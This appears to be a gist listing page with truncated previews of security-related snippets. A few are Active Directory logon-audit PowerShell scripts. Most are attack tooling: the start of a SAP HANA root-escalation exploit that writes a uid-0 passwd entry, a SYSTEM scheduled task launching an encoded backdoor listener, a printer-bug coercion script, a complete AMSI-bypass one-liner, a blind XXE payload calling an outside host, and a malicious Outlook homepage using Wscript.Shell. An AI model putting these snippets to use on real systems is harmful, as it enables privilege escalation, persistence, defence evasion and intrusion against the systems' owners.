This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys, hexdump, binascii | |
from Crypto.Cipher import AES | |
class AESCipher: | |
def __init__(self, key): | |
self.key = key | |
def decrypt(self, iv, data): | |
self.cipher = AES.new(self.key, AES.MODE_CBC, iv) | |
return self.cipher.decrypt(data) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import os | |
import signal | |
import sys | |
ATTEMPTS = (100 * 1000) | |
bin2exec = "/usr/sap/HXE/HDB90/exe/mdc/hdbmdcdispatcher" | |
socketfn = "/var/lib/hdb/HXE/ipc/hdbmdcdispatcher" | |
passwd_entry = b"anvil:x:0:0:Anvil Ventures:/root:/bin/bash" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Find DC list from Active Directory | |
$DCs = Get-ADDomainController -Filter * | |
# Define time for report (default is 1 day) | |
$startDate = (get-date).AddDays(-1) | |
# Store successful logon events from security logs with the specified dates and workstation/IP in an array | |
foreach ($DC in $DCs){ | |
$slogonevents = Get-Eventlog -LogName Security -ComputerName $DC.Hostname -after $startDate | where {$_.eventID -eq 4624 }} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$Days = 1 | |
$events = @() | |
$events += Get-WinEvent -FilterHashtable @{ | |
LogName='Security' | |
Id=@(4800,4801) | |
StartTime=(Get-Date).AddDays(-$Days) | |
} | |
$events += Get-WinEvent -FilterHashtable @{ | |
LogName='System' | |
Id=@(7000,7001) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$computers = Get-ADComputer -Filter * | |
$startDate = (get-date).AddDays(-1) | |
Write-Host "Please enter the username to search for logon events:" | |
$username = Read-Host | |
foreach ($computer in $computers) | |
{ | |
$Computernames += $computers.DNSHostName | |
} | |
foreach ($System in $Computernames){ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$confirmpreference = "none" | |
function Get-ScheduledTaskSystem | |
{ | |
$Name = -join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_}) | |
$SystemUser = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount | |
$action = New-ScheduledTaskAction -Execute "powershell" -Argument " -noni -noP -sta -enc JABlAGEAcwB5AGIAaQBuAGQAIAA9ACAAQAAiAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAE4AZQB0ADsACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBUAGgAcgBlAGEAZABpAG4AZwA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBJAE8AOwAKAG4AYQBtAGUAcwBwAGEAYwBlACAAQgBhAGMAawBkAG8AbwByAFMAZQByAHYAZQByAAoAewAKACAAIAAgACAAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABCAGEAYwBrAGQAbwBvAHIACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAcAByAGkAdgBhAHQAZQAgAFQAYwBwAEwAaQBzAHQAZQBuAGUAcgAgAGwAaQBzAHQAZQBuAGUAcgA7AAoAIAAgACAAIAAgACAAIAAgAHAAcgBpAHYAYQB0AGUAIABTAG8AYwBrAGUAdAAgAG0AYQBpAG |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# originally by 3xocyte, modified by agsolino after native MS-RPRN functionality was added to impacket | |
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample | |
# some code from https://www.exploit-db.com/exploits/2879/ | |
import os | |
import sys | |
import argparse | |
import binascii | |
import ConfigParser |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<meta http-equiv="Content-Language" content="en-us"> | |
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> | |
<title>Outlook</title> | |
<script id=clientEventHandlersVBS language=vbscript> | |
<!-- | |
Sub window_onload() | |
Set Application = ViewCtl1.OutlookApplication | |
Set cmd = Application.CreateObject("Wscript.Shell") |
OlderNewer